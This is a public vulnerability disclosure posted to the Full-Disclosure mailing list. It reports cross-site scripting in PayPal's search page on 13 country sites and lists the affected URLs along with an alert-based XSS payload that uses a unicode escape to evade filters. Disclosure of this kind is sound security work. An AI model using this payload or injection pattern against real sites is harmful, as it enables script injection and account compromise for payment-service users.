Dear Sir, I recently found out 13 more XSS vulnerabilities and Paypal shows no response. I am not a bad guy. But please make them aware about this issue before any skid play with this.
Regards, Un0wn_X
Hello I saw about the paypal XSS vulnerability and I researched more and more. I found out that 13 more countries are affected with this xss attack. https://www.paypal.com/ch/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/nl/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/be/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/jp/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/cn/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/fr/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/ie/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/ca/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/es/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/uk/cgi-bin/searchscr?cmd=_sitewide-search https://www.paypal.com/pl/cgi-bin/webscr?cmd=_sitewide-search XSS Payload: <img src="x:gif" onerror="window['al\u0065rt'](/XSS by Un0wn_X/)"></img> Image: http://www.anony.ws/i/2013/05/26/NTuWS.png I reported them and I did not get any reply. Please make them aware about this vulnerability. I am giving this is out for the awareness Researcher: Un0wn_X Email: [email protected] Follow @UnownSec
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
